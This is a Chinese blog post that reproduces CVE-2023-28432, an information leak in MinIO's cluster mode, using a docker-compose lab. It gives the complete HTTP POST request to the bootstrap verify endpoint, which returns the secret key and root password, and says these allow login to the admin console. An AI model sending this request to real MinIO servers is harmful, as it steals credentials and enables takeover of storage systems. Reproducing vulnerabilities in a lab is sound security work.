热门标签
热门文章
- 1科技守护城市:无人机技术在自然灾害预警与应急响应中的应用
- 2C C++最新29(1),2024年最新C C++高级面试题汇总_c++面试高级
- 3初阶数据结构——顺序表(详解)_初始化顺序表
- 4从零开始学习网络安全渗透测试之基础入门篇——(六)网络抓包&全局协议&封包监听&网卡模式&科来&wireshark&PC应用
- 5主成分分析(PCA)原理与特征选取_pca特征筛选
- 6Charles Android 抓包失败SSLHandshake: Received fatal alert: certificate_unknown_android charles received fatal alert: certificate
- 7python爬虫入门笔记:用scrapy爬豆瓣
- 8java反序列化漏洞详解_java反序列化漏洞弹出计算机
- 9狂神说Linux03:Vim使用及账号用户管理_vim 狂神
- 10一道有意思的多线程面试题 C# 代码实现
当前位置: article > 正文
【漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞
作者:黑客灵魂 | 2024-08-05 16:50:59
赞
踩
cve-2023-28432
启动环境
Sudo docker-compose up -d
Sudo docker ps
集群启动后,访问http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。
这个漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上,发送如下数据包即可查看泄露的环境变量:
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
可见,其中包含MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。使用这个账号密码,即可成功登录管理后台。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/933274
推荐阅读
相关标签
